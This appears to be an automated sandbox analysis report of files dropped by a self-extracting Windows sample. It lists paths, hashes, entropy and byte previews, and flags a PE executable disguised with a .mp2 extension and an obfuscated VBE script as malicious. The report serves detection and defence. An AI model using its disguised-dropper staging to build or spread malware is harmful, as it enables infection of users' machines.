                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="618306" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\RarSFX0\acqrc.dhq

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\Desktop\FX6KTgnipP.exe
                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):571495
                                                                                                                                                                          Entropy (8bit):4.050101452531791
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:6144:S8+nw3X1oeYXD39Gp74IazTb9A/OZBWxCcY5Nydt:sRe+DtU7FapA/Ork
                                                                                                                                                                          MD5:4F363A080CC5B7DF87865134BEA5A5A8
                                                                                                                                                                          SHA1:186AE3A77464644CDA4D0088F2FE47CADA63C411
                                                                                                                                                                          SHA-256:3EB7D48ECC57056FD63D437C73E2D97004D83C3F81D9D12FD59F9BD02BAEB47F
                                                                                                                                                                          SHA-512:C35F1CE633482418B2FD23D6FAA4FCEB118F90C9C08106E5DAF5E65DFFF81F73FC1B76BFE910A1B3C861EAA3614C07A9A50745A4226FB775C0D7D05FF1D8FAEC
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:0x4D5*9]]3]]]04]]]FFFF]]_8]]]]]]]4]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]0_8]]]0E/F_*0E]_409CD2/_80/4CCD2/546869732070726F67726/6D20636/6E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0*24]]]]]]]790/09*03D6067F33D6067F33D6067F3/**6*8F33*6067F3/**6**F33C6067F3/**6*_F33C6067F3526963683D6067F3]]]]]]]]5045]]4C0/0/]63D64256]]]]]]]]E]]20/0_0/0_]]5*04]]]]]]]]]80/4]]]/]]]07]4]]]4]]0/]]]]2]]06]]]]]]]06]]]]]]]]7]4]]02]]]]]]02]408/]]/]]0/]]]]0/]]0/]]]]]]0/]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]02E74657874]]]445804]]/]]]05*04]]/]]]]]]]]]]]]]]02]]06]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\RarSFX0\ancoicoift.bmp

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\Desktop\FX6KTgnipP.exe
                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):511
                                                                                                                                                                          Entropy (8bit):5.583899771066972
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12:huQQOtj+dGlIPpUbLUFfw6CaVWrYjlDQQ8DfGvebBPc:hQOtjvlKU/5CESeQ8D+mO
                                                                                                                                                                          MD5:9A38130722412B3DA7C8F01FA3951543
                                                                                                                                                                          SHA1:E6E5082B8258ABF0E4DE8FA3A9D78FED8113F59C
                                                                                                                                                                          SHA-256:1FF428831F3EE3453A0AAD13851CCDA311A940876D94000AE62D499108C96A19
                                                                                                                                                                          SHA-512:C73C6634394D94EB71F54E4B3A1EA1E36167FD6EB9110FB55588DBB84C774B3449BDF00B337E8B6C0EE6DA84D85C03A2F40484961952C159CF1EC5FFB765DB99
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:5q2A2O796KAgcG98e3NeBZEC1lwSd8Qf37me1Im9Fvx163Ov1yfg9R923f56Fm6N42RlI821InB282sXH50V83VKW044MC87py..TreeViewConstants FileConstants..N63G44tQ9467ucc70p7b15dOTt0N9EGV7mgCj744c8..ComboConstants ColorConstants..854bz5a6501V1120282hghi3NNN58s9fr623bYfp5r6U2nod1VC5312ST113rrJjbw5H3zcF2xE309Y300pId5W0q1i6Ew06m4902GNm0Tu594124w9hm08v15vuG06mC2..GuiDateTimePicker ButtonConstants..fi288Es299f1319D06JRcuZuu197MtI2nm58Z0m81Enn4r27965I6qKM955hM5126n30RLXZr0QfZ2x7SL9005oakc2s1785t7nO..ComboConstants TreeViewConstants..

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\RarSFX0\bxwre.xls

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\Desktop\FX6KTgnipP.exe
                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):537
                                                                                                                                                                          Entropy (8bit):5.704572179774912
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12:xN2Al1FkxT2BjNPEkcmXKw1fV412W/hiUnxHja:72AvGxmjJEkF6Gte/hiUn0
                                                                                                                                                                          MD5:24BE41947CD248379C4BF3376C7B512D
                                                                                                                                                                          SHA1:D672DCAD8399813B4D725A4FACBEDF7C06C232C9
                                                                                                                                                                          SHA-256:FBE9B125387CEE3486E264D3181353BFFDD19DBE3D5CCB727A64EF8A10226F12
                                                                                                                                                                          SHA-512:EF3636C77ACB4BE60CCBD282A0C18CEC38C295FEC56DD0571CCF21E429145F697023B805A1D62385558907B632A3DB0A3EB66B2FD1B96DB85577498D53C35B2E
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:JPN8BqP1130W86wL472KJy..BorderConstants BorderConstants..bmRb126IZBP84477A4NA5eBx3226z4DFTo8CU1E9722Hmp818ce342VX3sXsTY44kdY8i8nHGv743o9FHI8d5LNv04J1v1G5488JuyN52z0PXx27w2nQ3LV95f6SUkN086G682oo6S3R28kF8456xsI4g8vCdal73985mUJ962521A9i9N3Ar8lK22a9YRiW9nQf..GuiDateTimePicker GuiDateTimePicker..jp9f..GuiDateTimePicker DateTimeConstants..V8jm85c6fl1OqU379K2r3572420MJ38LR262U794943b6Kpk3v0m7HKy75kE4rs1EGaYtn6UH2M00hb2XxccLz9oK4li660k898G1c0OY8b3a8E79KhTZhRf8Zo8yO44d38NG7o5493eOxl9J9FEsmX60y2MIvVJIP8S..GuiDateTimePicker ToolTipConstants..

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\Desktop\FX6KTgnipP.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):947288
                                                                                                                                                                          Entropy (8bit):6.629681466265794
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24576:fYgAon+KfqNbXD2XJ2PH1ddATgs/u2kaCB+l:f37+KSbq5e1diEnHaCK
                                                                                                                                                                          MD5:0ADB9B817F1DF7807576C2D7068DD931
                                                                                                                                                                          SHA1:4A1B94A9A5113106F40CD8EA724703734D15F118
                                                                                                                                                                          SHA-256:98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                                                                                                                                                                          SHA-512:883AA88F2DBA4214BB534FBDAF69712127357A3D0F5666667525DB3C1FA351598F067068DFC9E7C7A45FED4248D7DCA729BA4F75764341E47048429F9CA8846A
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                          • Filename: uhbrQkYNzx.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: qPLzfnxGbj.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: ngPebbPhbp.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: FS04dlvJrq.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: M1Y6kc9FpE.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: mJIvCBk5vF.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: lcbF0sywlU.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: 1aG5DoOsAW.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: Factura-2410-CFDI.bat, Detection: malicious, Browse
                                                                                                                                                                          • Filename: DGFmCcZnM0.exe, Detection: malicious, Browse
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L...).(c.........."...............................@..................................L....@...@.......@.........................|....P..P............N..X&...0..Pv...........................C..........@............................................text...|........................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...P....P......................@..@.reloc..Pv...0...x..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2.exe

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):947288
                                                                                                                                                                          Entropy (8bit):6.629681466265794
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24576:fYgAon+KfqNbXD2XJ2PH1ddATgs/u2kaCB+l:f37+KSbq5e1diEnHaCK
                                                                                                                                                                          MD5:0ADB9B817F1DF7807576C2D7068DD931
                                                                                                                                                                          SHA1:4A1B94A9A5113106F40CD8EA724703734D15F118
                                                                                                                                                                          SHA-256:98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                                                                                                                                                                          SHA-512:883AA88F2DBA4214BB534FBDAF69712127357A3D0F5666667525DB3C1FA351598F067068DFC9E7C7A45FED4248D7DCA729BA4F75764341E47048429F9CA8846A
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                          • Filename: uhbrQkYNzx.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: qPLzfnxGbj.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: ngPebbPhbp.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: FS04dlvJrq.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: M1Y6kc9FpE.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: mJIvCBk5vF.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: lcbF0sywlU.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: 1aG5DoOsAW.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: Factura-2410-CFDI.bat, Detection: malicious, Browse
                                                                                                                                                                          • Filename: DGFmCcZnM0.exe, Detection: malicious, Browse
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L...).(c.........."...............................@..................................L....@...@.......@.........................|....P..P............N..X&...0..Pv...........................C..........@............................................text...|........................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...P....P......................@..@.reloc..Pv...0...x..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\RarSFX0\drafggp.mp2

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\Desktop\FX6KTgnipP.exe
                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):47623
                                                                                                                                                                          Entropy (8bit):5.5696126200975
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:768:CT5tWoBE30tQsOCnLiStoWanGJ23TU4RyOGUgmyU1n4dwo5+q1mbavxFq:CdtWmO+7OFEWRyP24yn
                                                                                                                                                                          MD5:5EF7B0C766266BC97D8AF8F4504F88E0
                                                                                                                                                                          SHA1:4F1C70B893DD0C101741030EE4ABCDFF8E5F3F90
                                                                                                                                                                          SHA-256:D13CA0EFA0973C4C475B6AC4E1B0DE49AEB9ED45AA1A703E8E473E28D6D885AC
                                                                                                                                                                          SHA-512:F75F0CAB7FE9F2550E601774A38D881CFD7A0AD329A17B9D6AEB333E98E026D928D89B42919FE606F416CADD1309438CB204741675B011D1E62AF5357674D833
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:f9r7SGpP2s3uwpI27w4wYhE64..408432gZ6V4459JJA4781Tj0l7kq9zg8nF66T1F4Fj715Y..PD29957A57a8Y5Z1I2gTWRIc9439nKQnLYLn8w9O2831YJ61W99CJB3O9g522M56aK4p42It9Y528R7ju9..Ow45SO34WN104wPmLq111JDgfy..I71373NP9W57s0KAYKE1WP6wHJ86c8Ph8mZ3v84Ggan4v5JXt91t83O6Sh65u1KeT8dYXn3jqL6q2ld4tm2l7zs..Z11B4uy1kIswuV1S7UEAo2Pwf346d52029XA3aed4134BX4704o65TM0Obg0279Dn8wKo15e..x5hF06o378jgS89O42LAy6826bacjn8sD1C1l4645928851g14S28O84513yy35b66942g31F9UiFy2E3ksaGWtL8..H4Z3763z6Fg2563eET711400M5344D9tCm271H8w8lXr0iWT9w4cORO2920Q4n88Lw0tD1AB..Q3VIBD43Sr0W1i5uihk350P8jQGf1362EY2..iUFk9hd278kDF5MmC2W7Q37jMq8nT23oS228J7O0258KI04680E2..0hDv29nk28027qsqD79l9J5MM3968P0872D..81bV446111s2S7K705pI0c2I43tYsDU..6q26uh336Q133t79785ib7F0i434H61d08OA1KtCtx2w6pYf9Pu..l63b629kw1Bm932336lADB3M4em21xdmp88fx1w1V829q04K3I03Qb496Hu0rU3Q1055K7IUD48qXfj44970t..9NxAj4Vr13U3e961792e841hF043Ypc598SOnD03p4223R0fJSV7454..Ge0GF0yawlR9ynzq51ykGL8p6le3Dz8fk0c7o0604R85J67..5xq2Gowi675U3Qu7rDL7268GB884dP653S0z99V6CZT4zE66736ib9102..7c4438K2hLGTOyX528p

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\RarSFX0\ecwfoem.msc

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\Desktop\FX6KTgnipP.exe
                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):512
                                                                                                                                                                          Entropy (8bit):5.5593426480653445
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12:e4sSdams2YBPU5CK5oPy/oVlDcHlM3QZWUUI0Dq:VsEXY65BoVElKcTUDm
                                                                                                                                                                          MD5:12F54BCDF984D85370EE7D582AF8FD88
                                                                                                                                                                          SHA1:F5DBD393CD200CA87FBC19A22C43B3EC66E3763A
                                                                                                                                                                          SHA-256:6DDE8B18B80CA1CC8C4EE5767057708B367A8FC2156EB8FCA88B3C4581461FED
                                                                                                                                                                          SHA-512:7EFD99CB19F6232C9E3516A04060C5C23517D83C5FE4E6F7D82498AB4BE78A0350301BACA677F20C854B35E99770971B34E02AFA2AD72DDCEBA0B64A38D28C9C
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:Y7On6BY143705pG94D3z1AN64RnH9Y3d2WO72TwG373zp2K9UX549b9x76VrGv4J2h7n8T26kHwL0113h20928p72c1741AiTH6453jX97o3L6A8eL38aC2o56z0c8Mry6hU865I..ButtonConstants TreeViewConstants..07AQX0zxW7D63Z68ow2IMbG54109Mk22ljt33dQeCv0rgKc3D28x9u3423Wlb1x7vJH612732Hv2t1R79KQ3gfH3T2327BlMIS95mwd3A3TQ1a3c..FileConstants FontConstants..8896P9h91L695D55o28o9k056Q8vR61umG8M28iXyax36m6Y240957ypTUR4u7Tn78hn586pXml58U99uB0otV15Sr29v97ZkR9..DateTimeConstants FontConstants..v76BF1qD8YcAV4H61HE55Q1M84..ToolTipConstants ButtonConstants..

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\RarSFX0\epvg.bin

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\Desktop\FX6KTgnipP.exe
                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):624
                                                                                                                                                                          Entropy (8bit):5.63236958266287
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12:SUR75pniERdtBuM6R4i5RE22rUKXu4GAQV8jB1HpaKRj36Rc:nI47C4iD/uUz8jBnaKzcc
                                                                                                                                                                          MD5:E6EBE63BB79F7980BAE352F03F5F771F
                                                                                                                                                                          SHA1:3F3142E6EFAF627E68E9D3D151DCB7A68476C53F
                                                                                                                                                                          SHA-256:C3A17A276B8675B9251D62FE773705B10F0C741B11BD0D0315C3854A5CA5D013
                                                                                                                                                                          SHA-512:E0006FBC6D31E33F03EACA10338F79D0B166CAEA0A45A86D0812F91C4D7C0FAE9A06D66DA6DB4B2EE99EF394C5A0B20B33AE17F0C3CCFC52D390AB09480F77E7
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:TR8W0qx5Z5Q9Ok0VQcJ29822b2B8O1144Yy63zGbI976TYF90sC3K8TN45R1Jatt7U24r885B6u9RluZs18wTz98z45V6p8YRL05904NIjK78vg1M311xKRWe7XY96..BorderConstants StructureConstants..5bZ2mV66vw1m90276P0PYPv32763bv3Fy49HZ4D9252XChJd409kID020Th5..FileConstants ColorConstants..T773KaS74k9Srl3OVC5ydo6M209n5t8Ki990Rg3548NE5297719XGw2g0X3W1f431k76D5RTSE7XF2p0XF2pngiOo5U2Vtw2i900b3BoO02qdoGHF1tH7..ToolbarConstants BorderConstants..hH0Ta29OT4Ko04T97ODuck56G1g2T5Jcnr03794aIg9RvO0Q63jEgqBr2pD3R739Dy9b8N255509RLJ66Z98A3LtM926bi31PkDvUU57K8644aH8c3P8434D01FiPSd263944Cwp7VwWZ52n6ZGK08t0504128y47fuS6Wfs8i52N67R8..BorderConstants StructureConstants..

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\RarSFX0\gdhatxr.das

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\Desktop\FX6KTgnipP.exe
                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):512
                                                                                                                                                                          Entropy (8bit):5.452149920932849
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:6:I9808R1VRg/ujLWOLWMmeExNJVVCScwmajRsIuTlvVcVSc9cWCgko6t6soqX4AiV:I9E1PFzm3xZMPEdepVcVP9R1z6roqIAg
                                                                                                                                                                          MD5:F7EB2BC8A4DDC2BB4CCBC06FC5429EAF
                                                                                                                                                                          SHA1:AEC5F233A38C75521A158B35A3A712216E1E86B8
                                                                                                                                                                          SHA-256:B3AA6848FDA2014AECFDACCABB2E128B7226ED6CCB2B174B123393C8E172878A
                                                                                                                                                                          SHA-512:0F880A592F09F2DA4C60FA6514FF7B08C0CB8170BE751685C55266C2C8741A4DFD6335F2D55062AA1495750E99FEB4146EE23A4B6953BA607E33874F63AEF110
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:58PFih095e64rB1Qb1lb6fH8iJBI8Q511vu7oPsZ4s0Pm8jq9e7592R2Vg90jgXwF7..UpDownConstants ComboConstants..66Jd83h78wp2pr4A8C3..DateTimeConstants DateTimeConstants..W542uO1BmF874Y..BorderConstants GuiDateTimePicker..5GBb8Q025..TreeViewConstants ButtonConstants..4Joh95t4..GuiDateTimePicker UpDownConstants..4B21l9AaE803JT40m60Nn58F74O2c5S7aB8J2Xaqe31r7Hpfy23..TreeViewConstants StructureConstants..tda8XCr909NB696zWV57w6R1D296wFqGFT08n67xPn0OeR8yjR4M5822x90QF9pKW96420gY69O7479sg8F5z41..FontConstants ToolTipConstants..

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\RarSFX0\gtntoskvgo.icm

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\Desktop\FX6KTgnipP.exe
                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):506
                                                                                                                                                                          Entropy (8bit):5.400734481941652
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12:vVjQRhAu2Z9LYdc3XdrN1pAOcyErHk2zjSuP+Rc:A1y6c3XdrNrcyYE2zuc
                                                                                                                                                                          MD5:CB4ED93EEA020FF87A9DF6EFDFB9D208
                                                                                                                                                                          SHA1:C96700B3279A6B3EB93A978108EC5166C51D192E
                                                                                                                                                                          SHA-256:11D20A6342BC523291335CD9511DE02D5F47B8A8F11828B7F76E9BFD523F14DC
                                                                                                                                                                          SHA-512:35252FA1A20C48725CCAF1E261EA559D4D6156376EFB1C5E793A6EC8EA6FA7C6806164153526A056544FD0CA0F415560F1043B41FA0A6D26F4029500E010D7B1
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:W1N3L0BV923KQ1401X6pa82Lu986Kyl99m5D02wU..StructureConstants FileConstants..208250Q990m5A78HP73j76u8Du17K9K37xO5S2t211fbhXplcJ40zi5P37..FontConstants ToolbarConstants..2R1m23Q1IBE96QK6IPYF1unds0m0S86593680et6aynS32QY..ButtonConstants UpDownConstants..O2j2N015yPSZSnklF59M956dak1jR681NqVbqQZYif16W..ButtonConstants ColorConstants..FNE55OD7969896Qx4IRQhj3l531G5kZt855m9651opl7S5JN..ColorConstants FontConstants..S6rjs600m8up2o36O0486D42w23R91k83Y3M2Vs346966S6212O9reKv6MB..ColorConstants StructureConstants..

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\RarSFX0\hmioxbowja.xls

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\Desktop\FX6KTgnipP.exe
                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):528
                                                                                                                                                                          Entropy (8bit):5.512809673932034
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12:iPTXGoqSQRVElqhktCU6wIAIPBPxswkfero2E:iPTWDhVUqrU6wI/PHshe0
                                                                                                                                                                          MD5:72F33CFA7A87ACA724962491FA47A632
                                                                                                                                                                          SHA1:B083A54636BAC1CAFE10CB945A5CFA06CDF10ECB
                                                                                                                                                                          SHA-256:FA2636ED27791C046440C8C9204BAC9F1B47880AAA78DC75C649360D00F57F62
                                                                                                                                                                          SHA-512:EA2BCACDC4F6A6DA5DB4DC40C61511D052C28DC52AE761F5EE160C84046778BD1D90C380DAB580DA2802232539D1ABBA565B8681B04A53E042A7E50DD0B72771
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:R26qoB7lccATRhuv37aysj09393zQ1126969440671p668iGC82jNKc749L3I6Y33TAvMwulnR4X171L54790s4e54..ToolTipConstants ToolbarConstants..4oc7E8Dr6L4H9p3QM1E1Q55t6y097K33VF80D6ye3P3Lz00432978S9ClP7Dc3HHM6n4fi0b2dJzHMwO3Sovcg6Kp3wxq1A518wh6Xz77pY..StructureConstants ComboConstants..74h1Uw6M4X57349Jk51171mT6et9O5b2SO22iKh6858916hy4837738EN3P3cMILC6mT3j4o4LT7..UpDownConstants TreeViewConstants..21216k1s64h38Civ46654Oh0267dE89639tea..DateTimeConstants ToolTipConstants..w45hqSDUSr74cN2j8b7Op1P0qw8lV1b3MN..DateTimeConstants FileConstants..

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\RarSFX0\isci.vbe

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\Desktop\FX6KTgnipP.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (406), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):87146
                                                                                                                                                                          Entropy (8bit):3.0153405135824465
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:QR9999999999999993YOOOOOOOOOOOOOOOOOOOOOOOKYOOOOOOOOOOOOOOOOOOOT:EHe2ifY6W7HvU8WCuBnQhnrQ
                                                                                                                                                                          MD5:45C37769735FB6C1AA4F65457E168CF1
                                                                                                                                                                          SHA1:BD2B772E2F98E459634383329EE79AE318626A2C
                                                                                                                                                                          SHA-256:7F2FBB352244C51AFAE0217E57FBA11A8D01E8909355FEC7BA6EDBEB325FE178
                                                                                                                                                                          SHA-512:17BDE64A24332D3504A73F2223D40592ACDF0A351E0A8397BBB659A6EA7A0501D9B4513BA2A8D368DB1216CFA28485E19831D5E062FF21994B8446D3E164BCB1
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Preview:..T.e.l.e.V.r.a.m.(.4.5.).:.T.e.l.e.V.r.a.m.(.4.5.).:.T.e.l.e.V.r.a.m.(.4.5.).:.T.e.l.e.V.r.a.m.(.4.5.).:.T.e.l.e.V.r.a.m.(.4.5.).:.T.e.l.e.V.r.a.m.(.4.5.).:.T.e.l.e.V.r.a.m.(.4.5.).:.T.e.l.e.V.r.a.m.(.4.5.).:.T.e.l.e.V.r.a.m.(.4.5.).:.T.e.l.e.V.r.a.m.(.4.5.).:.T.e.l.e.V.r.a.m.(.4.5.).:.T.e.l.e.V.r.a.m.(.4.5.).:.T.e.l.e.V.r.a.m.(.4.5.).:.T.e.l.e.V.r.a.m.(.4.5.).:.T.e.l.e.V.r.a.m.(.4.5.).:.T.e.l.e.V.r.a.m.(.4.5.).:.....T.e.l.e.V.r.a.m.(.2.4.2.).:.T.e.l.e.V.r.a.m.(.2.4.2.).:.T.e.l.e.V.r.a.m.(.2.4.2.).:.T.e.l.e.V.r.a.m.(.2.4.2.).:.T.e.l.e.V.r.a.m.(.2.4.2.).:.T.e.l.e.V.r.a.m.(.2.4.2.).:.T.e.l.e.V.r.a.m.(.2.4.2.).:.T.e.l.e.V.r.a.m.(.2.4.2.).:.T.e.l.e.V.r.a.m.(.2.4.2.).:.T.e.l.e.V.r.a.m.(.2.4.2.).:.T.e.l.e.V.r.a.m.(.2.4.2.).:.T.e.l.e.V.r.a.m.(.2.4.2.).:.T.e.l.e.V.r.a.m.(.2.4.2.).:.T.e.l.e.V.r.a.m.(.2.4.2.).:.T.e.l.e.V.r.a.m.(.2.4.2.).:.T.e.l.e.V.r.a.m.(.2.4.2.).:.T.e.l.e.V.r.a.m.(.2.4.2.).:.T.e.l.e.V.r.a.m.(.2.4.2.).:.T.e.l.e.V.r.a.m.(.2.4.2.).:.T.e.l.e.V.r.a.m.(.2.4.2.).:.T.e.l.e.V.r.a.m.(.

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\RarSFX0\kkpewqpssc.pdf

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\Desktop\FX6KTgnipP.exe
                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):588
                                                                                                                                                                          Entropy (8bit):5.533802343352673
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12:cQsyhiAzou5VsgdyFhetxREIM+1RWZBsPcLi+:cCzosnLEI3u8QL
                                                                                                                                                                          MD5:3D5FC93EC64B6C2079A1B51D5FEBF06C
                                                                                                                                                                          SHA1:194BEE9A0558C4899CD879D6F6E39F92471AD5B8
                                                                                                                                                                          SHA-256:507B3AF5F0F26DBFD4457899DDD2C72853BF0414669BD156A098C0B23BD36507
                                                                                                                                                                          SHA-512:D1AADC47C2EC4E8AF1F636B237E86DFE534FA38A88AAA5E95DAAC543D1783D3BA8B715FED6C883CD7EC23607E4A8B3896650048A430BA8D3668FF5D6EAEDED47
                                                                                                                                                                          Malicious:false
